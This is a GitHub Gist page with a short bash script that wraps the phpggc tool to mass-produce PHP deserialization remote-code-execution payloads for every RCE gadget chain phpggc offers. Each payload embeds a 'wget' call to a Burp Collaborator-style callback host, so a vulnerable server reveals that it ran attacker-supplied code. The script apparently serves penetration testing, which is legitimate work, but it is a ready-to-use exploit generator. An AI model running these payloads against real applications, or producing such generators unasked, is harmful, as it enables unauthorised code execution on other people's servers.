-
-
Save alanEG/e98c679fd03cbaa16189b0ad16345ae4 to your computer and use it in GitHub Desktop.
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )" | |
| if [[ ! -d SCRIPT_DIR/phpggc ]] | |
| then | |
| git clone https://github.com/ambionics/phpggc ${SCRIPT_DIR}/phpggc | |
| fi | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" | |
| # generate gadget chains | |
| php phpggc/phpggc -l | grep RCE | cut -d' ' -f1 | xargs -L 1 php phpggc/phpggc -i | grep 'phpggc ' --line-buffered | | |
| while read line; do | |
| gadget=$(echo $line | cut -d' ' -f2) && | |
| if echo $line | grep -q "<function> <parameter>"; then | |
| php phpggc/phpggc $options $gadget "$function" "$command?$(date +%s)" | |
| elif echo $line | grep -q "<code>"; then | |
| php phpggc/phpggc $options $gadget "$function('$command?$(date +%s)');" | |
| elif echo $line | grep -q "<command>"; then | |
| php phpggc/phpggc $options $gadget "$command?$(date +%s)" | |
| else | |
| php phpggc/phpggc $options $gadget | |
| fi; | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment